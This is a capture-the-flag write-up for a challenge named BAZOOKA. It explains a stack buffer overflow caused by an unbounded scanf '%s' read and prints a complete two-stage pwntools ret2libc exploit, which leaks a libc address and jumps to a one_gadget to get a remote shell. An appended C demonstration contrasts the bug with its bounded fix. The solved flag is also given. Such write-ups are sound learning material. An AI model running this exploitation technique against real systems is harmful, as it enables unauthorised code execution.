BAZOOKA

Proof of flag

ctf{9bb6df8e98240b46601db436ad276eaa635a846c9a5afa5b2075907adf39244b}

Summary of the vulnerabilities identified

Just a super simple buffer overflow (don't need to tell me "Try Harder", mom).

Proof of solving

The program first prompts the user to input "#!@{try_hard3r}"; entering it reaches the vuln function, where the buffer overrun happens because the scanf format string uses "%s" instead of "%Xs" (X a natural number, the maximum field width). First I find the libc base address and use a one_gadget to land on an execve("/bin/sh", 0, 0).

from pwn import *
#context.terminal = 'st'
p = remote("34.89.211.188", 30027)
elf = ELF('./pwn_bazooka_bazooka')
pop_rdi = 0x004008f3 #: pop rdi gadget
print(hex(elf.plt['puts']))
VULN = 0x4006f7 # address of the vuln function, returned into for a second read
# Stage 1: 112 bytes of padding, 8 bytes covering the saved rbp slot, then puts(puts@got) to leak libc, then back into vuln
exploit = (b"A"*112 + b"B"*8 + p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts'])
           + p64(VULN))
log.info("First Stage: Sending the cool killer exploit string: %s" % exploit)
p.sendline(b"#!@{try_hard3r}") # HA ha I really laugh at it
p.sendline(exploit)
p.recvuntil(b"Message: Hacker alert!!!")
p.recvline()
u = p.recvline()
u = u.split(b'\n')[0]
u = u64(u.ljust(8, b'\x00')) # leaked puts address, zero-padded to 8 bytes
log.info("puts: "+hex(u))
libc_base = u - 0x80aa0 # offset of puts inside the remote libc
log.info("Libc base at 0x%x" % libc_base)
ONE = 0x4f432 + libc_base # one shot gadget
# Stage 2: same padding, then return to the one_gadget (execve("/bin/sh", 0, 0))
exploit = b"A"*112 + b"B"*8 + p64(ONE) + p64(ONE)
log.info("Second Stage: Sending exploit...")
p.sendline(exploit)
p.interactive()
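Added illustration of the scanf mistake described in the proof of solving, side by side with the bounded form; this is not the challenge binary's source, and the 112-byte buffer, the sentinel layout and the inputs are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 112   /* matches the 112-byte overflow distance above */

/* Buffer followed by a sentinel, so a write past buf[BUF_SIZE-1] is visible. */
struct frame {
    char buf[BUF_SIZE];
    char sentinel[8];
};

/* The bug: "%s" has no width, so the read continues until whitespace,
 * however long the input is. */
static int read_unbounded(const char *input, char *buf) {
    return sscanf(input, "%s", buf);
}

/* The fix: width BUF_SIZE - 1 (111) leaves one byte for the terminating NUL. */
static int read_bounded(const char *input, char *buf) {
    return sscanf(input, "%111s", buf);
}

/* Feeds n_chars 'A's (constructed input) to the chosen reader. Returns 1 if
 * the sentinel survived, 0 if the read overwrote it, -1 on bad n_chars.
 * n_chars is kept below sizeof(struct frame) so the demonstration itself
 * never writes outside the frame. */
int run_read(int n_chars, int bounded, size_t *out_len) {
    char input[sizeof(struct frame)];
    struct frame f;

    if (n_chars < 0 || (size_t)n_chars >= sizeof input)
        return -1;
    memset(input, 'A', (size_t)n_chars);
    input[n_chars] = '\0';

    memset(&f, 0, sizeof f);                      /* frame is NUL-filled */
    memcpy(f.sentinel, "CANARY!", sizeof f.sentinel);

    if (bounded)
        read_bounded(input, f.buf);
    else
        read_unbounded(input, f.buf);

    if (out_len)
        *out_len = strlen((const char *)&f);      /* bytes the read stored */
    return memcmp(f.sentinel, "CANARY!", sizeof f.sentinel) == 0;
}

/* Length the reader left behind for a given input size. */
size_t stored_length(int n_chars, int bounded) {
    size_t len = 0;
    run_read(n_chars, bounded, &len);
    return len;
}
```

With 116 input characters the unbounded read spills four bytes past the buffer and clobbers the sentinel, while the bounded read stops at 111 characters and leaves it intact.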